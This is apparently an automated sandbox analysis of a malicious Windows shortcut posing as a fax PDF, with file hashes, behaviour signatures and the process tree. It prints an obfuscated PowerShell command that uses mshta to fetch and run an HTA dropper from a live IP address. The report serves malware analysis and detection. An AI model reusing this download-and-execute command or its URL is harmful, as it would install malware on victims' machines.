Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10/05/2024, 16:25
Static task
static1
Behavioral task
behavioral1
Sample
COMPUTER-FAX.PDF.rtf.lnk
Resource
win7-20240221-en
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
COMPUTER-FAX.PDF.rtf.lnk
Resource
win10v2004-20240508-en
6 signatures
150 seconds
General
-
Target
COMPUTER-FAX.PDF.rtf.lnk
-
Size
2KB
-
MD5
79877bc985de86df896986574cc1df56
-
SHA1
424d3990f1802955a01557691e02bb69699ba3bc
-
SHA256
b716f1e8540340c6a269ee25aa67cb7af7366c3c2c8223dfcf4240de5bc6e7de
-
SHA512
96186acb36a3770ca2d97c272d0c5785f9c8d40e082a7093cc7a97249dcb16502cde1abea263f1a41b2fb49f1ab9ecc1d88f7e81ebaa79834ff98e644d81f51b
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
http://13.75.76.78/stfx/out-454148433.hta
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2632 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2424 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2424 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2208 wrote to memory of 2424 2208 cmd.exe 29 PID 2208 wrote to memory of 2424 2208 cmd.exe 29 PID 2208 wrote to memory of 2424 2208 cmd.exe 29 PID 2424 wrote to memory of 2632 2424 powershell.exe 30 PID 2424 wrote to memory of 2632 2424 powershell.exe 30 PID 2424 wrote to memory of 2632 2424 powershell.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\COMPUTER-FAX.PDF.rtf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$rp=[string][char[]]@(0x68,0x74,0x74,0x70) -replace ' ','';$rp=$rp+'://13.75.76.78/stfx/out-454148433.hta';mshta $rp"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" http://13.75.76.78/stfx/out-454148433.hta3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:2632
-
-